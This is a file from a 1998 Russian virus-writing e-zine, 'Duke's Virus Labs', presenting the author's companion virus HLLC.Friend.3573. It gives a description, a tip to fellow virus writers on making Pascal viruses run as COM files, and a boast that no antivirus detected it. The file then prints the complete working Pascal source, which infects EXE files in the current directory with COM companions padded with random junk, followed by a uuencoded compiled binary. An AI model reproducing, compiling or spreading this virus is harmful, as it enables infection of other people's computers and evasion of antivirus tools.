Magazine "Duke's Virus Labs"          Number 01          File 010
 ▄▄▄▄▄▄  ▄▄▄▄▄    ▄       ▄  ▄▄▄                  ▄▄▄▄▄   ▄▄▄▄▄▄
          █  ▀█▄  █       █   █          █  █       █
 ▀▀▀▀▀▀   █    █  ▀█     █▀   █        ▀▀█▀▀█▀▀     █     ▀▀▀▀▀▀
 ▄▄▄▄▄▄   █    █   ██   ██    █        ▄▄█▄▄█▄▄     █     ▄▄▄▄▄▄
          █  ▄█▀    █▄ ▄█     █    ▄█    █  █       █
 ▀▀▀▀▀▀  ▀▀▀▀▀       ▀▀▀     ▀▀▀▀▀▀▀              ▀▀▀▀▀   ▀▀▀▀▀▀

                      HLLC.Friend.3573

Имя вируса    : HLLC.Friend.3573 или Friend-1
Автор         : Duke/SMF
Тип           : companion (компаньон)
Дата создания : 1.06.98
Длина         : 3573 байт
Язык          : Turbo Pascal 7.1
Упаковщик     : LZEXE version 0.91
Поражает      : EXE-файлы текущего каталога


   Перед вами очень простенький вирус. Но главный прикол  состоит
в том, что компаньон-вирусы, как правило, написаны на ассемблере,
чтобы откомпилированный вирус имел расширение имени COM  (и,  ес-
тественно, COM-структуру). Тогда он  сможет  поражать  EXE-файлы,
создавая COM-файл спутник. Но Turbo Pascal 7.1  компилирует  свои
файлы только в формат EXE. Утилиты типа EXE2COM могут быть  мало-
результативны в этом случае, поэтому я использую способ попроще -
переименовать откомпилированный вирус в файл с расширением COM. И
это все - вирус готов к запуску ! B-P~
   Советую перенять этот приемчик вирусописателям-любителям  язы-
ков высокого уровня. Тогда не придется возиться с довольно затяж-
ной процедурой постоянного переименования файлов:
         prog.exe -> prog.dat
         vir.exe  -> prog.exe
         запуск prog.exe
         prog.exe -> vir.exe
         prog.dat -> prog.exe
(хорошо, если вирусописатель додумается не  _переименовывать_,  а
_копировать_  vir.exe -> prog.exe - оптимизация, однако Ж8-)
   После создания этого вируса я стал искать вирусы, которые  ис-
пользоваль подобную технологию раньше меня. Все энциклопедии  ви-
русов и virlist'ы по этому поводу ничего не сообщают. Возможно  я
новатор в  этом  направлении,  но  есть  подозрение,  что  вирусы
HLLC.5000 (по DrWeb'у) и HLLC.Happy (по AVP) работают  аналогично
- они упакованы LZEXE (утилита только только  для  EXE-файлов)  и
создают COM-спутники.
   Вирус проверяет файлы на повторное  заражение.  Скорость  рас-
пространения вируса довольно низка и скорее зависит от  "счастли-
вого случая", поэтому в "живом виде" (любимое  выражение  Каспер-
ского) его найти будет сложновато. Вирус  обрабатывает  параметры
командной строки и передает их пораженному файлу при запуске.
   Длина созданного файла-вируса при очередном  заражении  варьи-
руется от 3753 байт до 4253 байт благодаря  приписыванию  всякого
мусора в конец - он не влияет на работу программы, но в одной ди-
ректории не будет нескольких COM-файлов с одинаковой длиной (т.е.
это своего рода маскировка).
   При поиске этого вируса AVP 2.2 скажет о содержимом  EXE-файла
под именем COM-файла. Поскольку эта версия  программы  уже  давно
морально устарела и в  дальнейшем  такая  проверка  была  убрана,
поиск вируса без знания сигнатуры невозможен (это все таки  Turbo
Pascal, а не assembler какой-нибудь :).
   На момент выхода журнала в свет (начало августа 1998) этот ви-
рус не детектировался ни одним антивирусом :*))

                                      Duke/SMF

===== Cut here ===== начало FRIEND1.PAS =====
{$M 5000, 0, 5000}
uses dos;
const virsize=3573;
      e='.exe';
var  ds:dirstr;
     ns:namestr;
     es:extstr;
     f,g:file;
     s:searchrec;
     mas:array[1..virsize] of char;
     st:string;
label infect;
procedure zar;
var i:integer;ch:char;
begin
fsplit(s.name,ds,ns,es);
st:=ds+ns+'.com';
assign(g,st);{$I-}reset(g,1);{$I+}
if ioresult<>0 then                              {ещё не заражен}
  begin
  rewrite(g,1);
  blockwrite(g,mas,virsize);
  for i:=1 to random(500) do                        {пишем мусор}
    begin
    ch:=chr(random(250));
    blockwrite(g,ch,1);
    end;
  end;
close(g);
end;
begin
st:='This is [Friend-1] virus. (c) by Duke [SMF] 1.06.98';
fsplit(paramstr(0),ds,ns,es);
st:=ds+ns+e;
assign(g,st);{$I-}reset(g);{$I+}
if ioresult<>0 then goto infect; {если не найден пораженный файл,
                                                то заражаем всех}
close(g);
exec(st,paramstr(1)+paramstr(2)+paramstr(3)+paramstr(4)+
                            paramstr(5)+paramstr(6)+paramstr(7));
infect:                                       {поиск и заражение}
assign(f,paramstr(0));reset(f,1);
seek(f,0);
blockread(f,mas,virsize);
close(f);
findfirst('*'+e,$21,s);
zar;
while doserror=0 do
  begin
  findnext(s);
  zar;
  end;
end.
===== Cut here ===== конец  FRIEND1.PAS =====
===== Cut here ===== начало FRIEND1.UUE =====
            Имя исходного файла : FRIEND1.COM
                         Размер : 3573 (4Kb)
                  Дата создания : 01-Июн-98 21:11:52
               Дата кодирования : 31-Июл-98 16:09:59
                 Размер UU-кода : 6Kb
              Количество секций : 1
     Число строк в одной секции : 80


section 1 of file friend1.com  < uuencode by Dos Navigator >

filetime 616671610
begin 644 friend1.com
M35KU`0<````"`-\"&`0R`8`````2`+D`'````$Q:,#G__P0N8V]M58GEN`0!
MFLT"3,,_`('L][_"`1Y7OU``IOC[E/N>^YI\`+\'-`"-OOS^%N;\FN`&TS[>
MX9I?!_8```[V_>&GQ@_LN/\`4)KZWD1W)+7MFIH$\?VX`8SCX]7RFHJ/"9NB
MP'1[Z?@)WNF1Z>F'Q_S0Z/4-4#'`4.0]#,<%Y/VX]`'RXPG',/>)1OK*._I_
M.#R,]?[K`__[N/IT/KKDB$;]O(U^_9`!3:2\^`V+U>?]R'7-W)I6Z?Z)[%W#
M'_\S5&AI<R#]6T9R:65N__]D+3%=('9I<G5S+B`H8RD@/QQB>2!$=6MEXE--
M1OY_YS$N,#8N.3@$+F5X904J.KCZF@``N*[R``?P^J[U][\3`0[Y].;WC;X`
M@"O_9VN:6-CRDO`4&>W>DO`41[&2\">`DO`.`Y65Z:#F_`KX"<V1_'KST&5N
M\13QN`+Q_9*TL>RS\@/L^`[\[`2QL>SX#OOL!>SX#OKL!K&`[/@.^>P'[/@+
M%:.2!;^D%=[P#2[\Z$QPP.@)1.W;,=)22%KK*-CK_\+H#<`3_[(#Y`3X"DRT
M\;@AK1C_Z.SR`(+H[OR#/L8WO1``=0_L_#[LVOSKZG#PXNFTFA8!RO__58O_
M_^R#[%`>Q78,C7ZP%@?\K#S__T]R`K!/F)'SI#+`JL56!K0//QK-(8U6Y1^+
M3@JT3OP_]!_$?@;H(`"+Y5W*"H$'PL7<_!^T3_L:X.0$`.;\<AX?_H/''AX&
M'[NY``'\\J[_\/;1BL%/B_=._:BJ_!]#"C/`HV##POS__X82K(K0,O:+V@O;
M=`^`>/_C?UQT"?HZ=`-+=?&X0P#X_ZT.Z"<`,]OK!H`X+G1_'`5#.]IU]K@(
MZ0KH0#H>RT?QBP4`'\##BO`KTSO#08L?IL.JB\@#WI:+\YP?_HDFR!",%N*!
M[/X`CAXW0C@`H2R'X?(4A0KH#PN"#O@.=@:-O@+_<3KK?NM^JNJP#:H,?P*-
MMNN)=O2,7O9&^';,XHE^^(Q$XBGD\7[2"/WR_/+^\OQ6@HU>!X#RN`!+]<`:
MX1BZ]H[:^HM_CB/`?_L+6D2T4!Y-XLN`]=Z,!A[":C/MZ'<MH"W$__\%$P"Q
M!-/HC-(#PJ,*`*,,PQ```P8;HP[]&$+`_1S]),_1P_\FH0+U(`#'!BH`U@",
M\(<.+;_,$KXY`KG$'_Z0_"ZLM#6>B1V,10*#_R''!.+O'@X?N@P!:R4,Z>NZ
M$_@C^-L`*<2X)/@$\#_X'_X?N,P0'E#^N&,"#E`.X=#H3OKHR`+L$>SX"GCX
M.NRY`LLKG%N`Y___#U.=G%F`Y?"`_?!T#D"`S_XA\/#]=`%`HDP`P]O*_/]A
M^X/$!EB#YQ^!QY8`@/_A_#ES`[___U>T5).+[/__@$X6`5A;65I>7UT?!\^X
MT/C?`-7K`[C(`%E;ZP?QV??_,\DSV^;S^Z,R`(O!"\-T/?_`H1``"\!T+X[`
M!O\?]ALKPW<7]]@]`!!S$+K^/^[WX@/!<@<F.P8(`'(&_/?=%`#KT8O(C,,K
M$/&#Z_\_$(D.-`")'C8`Q!XN`(S`%H:Q$W[I]:,P_0\7/`"X;@$@!E/+_?,*
M^QPJ"/SW(0*L\`TE'L4Z#!76\:WR\*&P"P8?AK!T*;M,`LX`H5HP!.C]NUOT
M'O3X@^GH0`"P.NA5]2&DB.$UZ6#I!]WA8;1,P2Z*!PI#!NCX\6E#Z_/#L63F
ML0KA'^@"400RY/;Q!#!0/PR^6(K$PU#\Z`%_&/90L032Z.@#]R0/_H?D/#IR
M`@0'BM"T!KC__\,``ALA(R0T-38W.#DZ.SS__ST^/W52=6YT:6UE(&5R<F\?
M/G(@`"!A=/LN#0H`4,#_\NAO;G,@0V]P>7*#_VEG:.CWRC$Y.#,L.3+A_R!"
MX6QA;F0SP(<&/`##A\N#/OL`=0'+H?G__^EP_HOT-HY$`B8[50)_!WQP/!3X
M!7(/\P9\",!A\?A%!'?8N,EX.-A(_KC7^D+^!?Q_:W(-*\1S"??8.P8Z`'(,
M_^+*Z"K^NC/2B]S_X1XVQ'\(-L5W!/R6J[CA"+#7_(``J_4?A_^-172KC.S\
M"/ST_TSLN0X`\ZNY3P`+TG7_^PFL.LAV!(K(XPBLR/$#JN(6\/A;X1^[X:^P
M"C8/&(M'!":)=_@&8PSX#/@(^`Y(_;SZ]@I:V;JQU^O#ZPBZLOL#NK/7[]G/
MV2:'PXM%`CWI=!(]Z73A^`T]<G00QP)F`.O_!"12!E<.Z"4`6KT^A`FY_KL0
M`.AD=,<`!L?'TA[:L-3H,?8!L?V!?0*R&&$*^*\(M&</Q^`84+L4R14`6$4#
M"`R['/5TP/@)<'N9_B;_&37I`WOI7P?#X1#=]#'%50QA3=Z$^(L=M#^YV1"!
M``%SQPL`!A"@Q_:XH^X?,-#X"C/))H=-6,Y`'F;.!RO!K+AETY7AV_@88MG@
M_.'K@_LO:@1V!K0^YOSG3/`59/$6/_QD\"&@3@"T/<#K!K@`/!TTN@':RL1^
MA^3QF/$:U?WXL]SUD/$T4(_S3`!:6/\/)H!],`!T$AZ-53`&'^Z%4I3A<P;E
M\>L1DLKRS._K)HD%BT89\@1=R@9&_;?A=6@=#B8J_'.U\BK_Z!R:6.07)?T)
M)>%^].V'N/)W_`93],.T/[IDE+#_!;FZ94[\"NC<_W4;'@I_4A_)</6^6A]R
M!CO!=(B>>,*V.O*S/[GN(<JS0+G*_1#HILH_]#]8"B?Q'!Y1)O=E!(O(G`.]
M#(KCOUF_A#TETNIU!,GIC,(+Q,.`!2GK'#O/=!-J%XD.$J;D_WOJ!6@(F`YN
M_DJD(14?I`BJ_//R]P/*B]"O&*2X`$(>_9S*T(N&X4@+TKWH2:PPM#!<,.0\
M`]T`<B7"R_C_^RP`,__\)CH%=`>Y__^%__*NZ_2#QP.+]U/!].L:D?;01L%-
M\?RJ`<FGP0(Z#=327-F3R\2_@/__P8H-,NU',]OC"2:`/2!W`X/Y1^+WQ?/\
M=O/'*__OQG0$0TIUWL/\B]R,VKKNK`.LJHK(QZV.VL;Q$!_F_.H*X@8VBT]^
M"^(ZP78"BL'<^`D*W/UQ$>`,V`B*W='8_C\KR7\#N0$``_$KP7(30,&'QNY]
M`C/).\%7+@:+P>M!Z0'!OPB___/_@4FL)@`%<P@FQ@4`!_^5&`/Y1Y&]E6_]
M,[MV"OPSZBQMNB?B_@_-*\IR'$%'K/*N=17_/R:+V8O*2?.F=`Z+^(O+BQQ^
MT4;KYH_K!$@K1@9%8=;QCOY1?NJ3BB4</Y\ZS"?,"LET!G[I)J9U`CK$8_X$
ML`%?HZHVBD<$JIGQ4?X*OVAR[/'K-OT&8G:A`H-XJ&P!?07'DP&@I;7KZND&
MK:ORZ4A*R<O^SK&NX@/RA?_]I-__=@::HNHA<JS^_.G=[`C8_O1X_C:R#*'X
M"@!^88%^,(0(TW]:^0;Y!)!^D_GG",&TB/J(^!$(B%/^&!J1^`KL`\I0C?PY
M:S:-=HW\[_P$C#W2'OSW&'\$,\F)#;@`/;W4#;![ZP+_!6?D`K0\[]L)\-EI
MV5J_-HD%N`L$NDSCN]/\+PKJ1'SRY/;"@+A@Y>SAVG7\UQ3!=0/H*P"X.\_^
M"^'_'[+7B444B546B4T8B5T:#M'O'(`$^Q[A]],!.S/2V;$"N^$M@!RJ$=H`
M<V?`_-&CX4.PI.6-E>BY_6G4<_#QF>FJ.]AT((#L&G1_)0-#Z_*+TRO0L^&Z
M_;&/\&S:P^A:%K@V]V?[T`2+P?C\`\&#TNO"#O'W_^@]`)/WP;D@`/;&@'4*
MT>/_]]'2_LCB\S+`@.9_RYBAS3P?\)\&/@K--_OUF`;P]SKU-?W-.=G-/;^J
M3^#A^/^AZ(L>0`<N]R:0?G;!X?X"Z0/1`],,/[7C^@+SL073XPP0^@4!+(VC
MAF_2B1;2PP6$M"S>J0[[#_'\RUR2![D8$RO/T>FOH"G\\ZO#WY@)__@2'>'X
M'&$%__@/$)X`H-'!@MD0`0``\````%(!``"($R@"N0!4`$4".^<```8.'XL.
M#`"+\4Z)]XS;`QX*`([#M``Q[?VL`<6JXOJ+%@X`BL(IQ8K&*<4YU70,NI$!
MM`G-(;C_3,TA4[A3`%#++HLN"`",VHGH/0`0=@.X`!`IQ2G"*<..VH[#L0/3
MX(G!T>!(2(OPB_CSI0GM==C\CL*.VS'V,?^Z$`"MB<71[4IU!:V)Q;(0<P.D
MZ_$QR='M2G4%K8G%LA!R(M'M2G4%K8G%LA#1T='M2G4%K8G%LA#1T4%!K+?_
MBMCI$P"MB]BQ`]+O@,_@@.0'=`R(X4%!)HH!JN+ZZZ:L",!T0#P!=`6(P4'K
MZHG[@^</@<<`(+$$T^N,P`'8+0`"CL")\X/F#]/KC-@!V([8Z7+_*D9A8G)I
M8V4@0D5,3$%21"H.'[Z=`5N#PQ`QTJV)P>,3B\(!V([`K8OX@___=!$F`1WB
M\X'Z`/!T%H'"`!#KW(S`0([`@^\0)@$=2([`Z^*+PXL^!`"+-@8``<8!!@(`
M+1``CMB.P#';^H[6B^?[+O\O0U)#($5R<F]R#0HD1``.`"L`.P!%`$\`70!L
M`'H`?P"1`)8`K0"R`+L`UP#Q`/8`"`$-`54!8`%W`84!F0&I`;,!O0'+`=H!
MZ`'M`?X!`P(7`B8"*P(Z`C\"3@)3`F("9P)V`GL"B@*/`I0"IP*L`KH"OP+/
M`M0"ZP+P`OH"_P(2`R8#-0.?!,$$VP70!_$-#`XB#D$.````````````````
2````````````````````````
`
end
sum -r/size 666/3573 entire input file
===== Cut here ===== конец  FRIEND1.UUE =====
----------------------<end of file>------------------------------
